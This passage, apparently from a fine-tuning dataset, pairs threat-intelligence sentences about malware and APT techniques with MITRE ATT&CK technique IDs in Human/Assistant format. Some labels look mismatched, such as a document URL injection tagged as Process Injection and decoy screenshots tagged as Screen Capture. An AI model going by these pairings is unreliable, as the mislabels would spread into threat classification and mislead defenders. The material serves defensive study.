‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’ from ‘autocheck autochk *’ to ‘autocheck autoche *’.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access to Registry keys is controlled through access control lists and user permissions.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp adds itself to the LD_PRELOAD path and sets a series of environment variables.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,netstat ### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer used several tools for retrieving login and password information, including LaZagne and Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RegDuke can extract and execute PowerShell scripts from C2 communications.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron can be configured to automatically collect files under a specified directory.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can dump the SAM database.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee performs data exfiltration is accomplished through the following command-line command: from .txt.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can obtain the victim user name.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reflectively loaded payloads may be compiled binaries, anonymous files , or just snubs of fileless executable code .### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In order to decode this data, Comnie first decodes it using base64 with the following non-standard alphabet (note that it is simply the original alphabet in reverse): /+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA   The resulting data is then parsed and decrypted using RC4### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Felismus samples use a custom method for C2 traffic that utilizes Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used has used Metasploit’s named-pipe impersonation technique to escalate privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use hidden users to mask the presence of user accounts they create or modify.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt has masqueraded as a service called ""SaSaut"" with a display name of ""System Authorization Service"" in an apparent attempt to masquerade as a legitimate service.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of open application windows.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak has obtained and used open-source tools such as PsExec and Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In doing so, it will attempt to detect the following Anti-Virus products via various techniques: Trend Micro Kaspersky Symantec Avira AVG ALYac Ahnlab Ahnlab and ALYac are the most widely used Anti-Virus solutions in South Korea, and Trend Micro and the rest are also known to be most widely used in Taiwan### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Interestingly, we’ve seen recent samples embedding decoy documents that are screenshots of botnet C&C panels or dumps of credit card numbers### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can spread itself by infecting other portable executable files on removable drives.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources and other organizations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have also used zero-day exploits.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can collect the OS, and build version on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth has a command to list its directory and logical drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has been installed via MSI installer.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These vulnerabilities were patched last December 28 2015, April 5, 2016, and May 12, 2016, respectively### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a command to open a file manager and explorer on the system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adding an entry to the ""run keys"" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Almost any network protocol may be used for flooding.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JScript is the Microsoft implementation of the same scripting standard.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For instance, this Trojan uses the InternetExplorer application object much like the previous OopsIE Trojan and a very similar sequence of requests to obtain commands### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak has used a VBScript named ""ggldr"" that uses Google Apps Script, Sheets, and Forms services for C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy has the ability to capture screenshots and webcam photos.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete sends stolen data to the C2 server every 10 minutes.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a document is found matching one of the extensions in the configuration, TINYTYPHON uploads it to the C2 server.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch can automatically monitor removable drives in a loop and copy interesting files.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this particular instance, the payload is encoded via base64, which certutil decodes### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To use Google Drive, the x_mode command received from the C2 server via DNS tunneling will be followed by a newline-delimited list of settings needed to interact with the Google Drive account### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can enumerate processes on a target system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Flame identifies security software such as antivirus through the Security module.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DropBook can collect the names of all files and folders in the Program Files directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS has a command to download an .exe and use process hollowing to inject it into a new process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UBoatRAT can upload and download files to the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT has used AES ciphertext to encode C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can identify administrator accounts on an infected host.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised email accounts can also be used in the acquisition of infrastructure .### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Starloader decrypts and executes shellcode from a file called Stars.jps.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti for Linux has the ability to deploy modules directly from command and control servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has stopped SQL services to ensure it can encrypt any database.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya can use valid credentials with PsExec or wmic to spread itself to remote systems.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT3 downloader uses the Windows command ""cmd.exe"" /C whoami to verify that it is running with the elevated privileges of “System.” A Gamaredon Group file stealer can gather the victim's username to send to a C2 server.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can launch a reverse command shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PS1 can use an XOR key to decrypt a PowerShell loader and payload binary.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar gathers information about network adapters.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper may set up a reverse SSH tunnel to give the attacker access to services running on the victim, such as RDP.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can download a module to search for and build a report of harvested credential data.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy digitally signs the malware with a code-signing certificate.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can call regsvr32.exe for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OS Credential Dumping is used to obtain password hashes, this may only get an adversary so far when Pass the Hash is not an option.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute malicious payloads via loading shared modules.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOMEFRY can perform credential dumping.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Peppy has the ability to execute shell commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer uses custom encryption for C2 that uses RSA.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has renamed the ""psexec"" service name to ""mstdc"" to masquerade as a legitimate Windows service.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie can use ICMP to receive information on the destination server.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's loader can create a new service named NtmsSvc to execute the payload.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has gathered system information using systeminfo.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4)### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader uses a simple one-byte XOR method to obfuscate values in the malware.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about hosts may also be exposed to adversaries via online or other accessible data sets or Search Victim-Owned Websites.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury can automatically exfiltrate gathered SSH credentials.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used compiled HTML files for targeting.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FALLCHILL can search files on a victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has executed malicious .bat files containing PowerShell commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has collected the username and UID from the infected machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can base64 encode C2 replies.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Service paths and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks .### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson has the ability to determine the date and time on a compromised host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer contains a module that tries to obtain stored credentials from web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used webshells including P.A.S.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can RC4 encrypt strings in C2 communication.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Much like the previous version of Reaver, Reaver.v3 will query the necessary registry keys to determine the correct startup path to use### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware may be placed on infrastructure that was previously purchased/rented by the adversary or was otherwise compromised by them .### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 5 shows Phishery’s output to the command that injects a URL into a file named “good_test.docx”, which it will save the resulting file to “bad_test.docx”### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Third-party applications and software deployment systems may be in use in the network environment for administration purposes .### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used WMIC.exe for lateral movement.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used WMI for execution.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Its main functions are: Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversary assumes the security context of whichever browser process the proxy is injected into.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use dynamic resolution for the purpose of Fallback Channels.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has created a scheduled task to execute a .vbe file multiple times a day.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron is capable of executing commands via cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has abused local accounts that have the same password across the victim’s network.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has the capability to discover the system OS, Windows version, architecture and environment.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command ID 17 indexes to a function that collects the system information and sends it to the C2 server.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is installed as an ISAPI filter on Exchange servers and shares characteristics with the China Chopper Web shell.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example: * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command The values of the keys listed are commands that are executed when the handler opens the file extension.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has encrypted C2 communications with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2: Process chain for the first part of the campaign Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HKCU\Software\Microsoft\Office test\Special\Perf ### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa discovered system proxy settings and used them if available.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The script is used to decode and execute the following payloads:Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.Appach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.PoohMilk AnalysisThe PoohMilk sample is designed to perform two actions:Create persistence to execute the Freenki sample at the next reboot.Check specific files on the infected machine.The first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file previously downloaded### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can report the file system type and disk space of a compromised host to C2.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell has used RDP for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A total of 64MB of garbage data is appended to this copied file, likely as a way to deter any security products in place that may be scanning files on disk### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The code is obfuscated in order to hide any malicious activity on the remote server### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has used the BOtB tool that can break out of containers.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Previous related research: https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html?m=1 https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/ https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/ https://www.sekoia.fr/blog/falling-on-muddywater/ Decoy images by country Jordan The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc Turkey Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc) Saudi Arabia Document signed by the Major General Pilot, commander of the Saudi Royal Air Force KSA King Saud University (KSU) KSA King Saud University (KSU) Azerbaijan İnkişaf üçün görüş.doc (meeting for development) Iraq Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers Pakistan ECP.doc National Assembly of Pakistan.doc P.Police.doc Afghanistan President.doc, E-government of Afghanistan Technical details Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RGDoor decodes Base64 strings and decrypts strings using a custom XOR algorithm.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information reported by vendors may also reveal opportunities other forms of reconnaissance , establishing operational resources or Obtain Capabilities, and/or initial access or External Remote Services.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage has a persistence component to write a scheduled task for the payload.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources APT28 has collected information from Microsoft SharePoint services within target networks.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX allows the operator to capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has embedded malicious macros within spearphishing attachments to download additional files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD also collects information stored in the Windows Address Book.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can check for connected USB devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic with Web Protocols or even enabling Adversary-in-the-Middle if added to the root of trust Install Root Certificate.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used pass the hash for lateral movement.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,net view ### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can enumerate all running processes and process information on an infected machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use TCP in C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rundll32.exe is commonly associated with executing DLL payloads .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework., rc.local### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can download and execute files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command & Control The malware communicates with the Naver email platform in order to communicate with the operator### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher injects itself into various processes depending on whether it is low integrity or high integrity.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackMould can send commands to C2 in the body of HTTP POST requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Poseidon Group searches for administrator accounts on both the local victim machine and the network.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon obtains the target's IP address and local network segment.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This could include maliciously redirecting or even disabling host-based sensors, such as Event Tracing for Windows , by tampering settings that control the collection and flow of event telemetry.### Assistant: T1562: 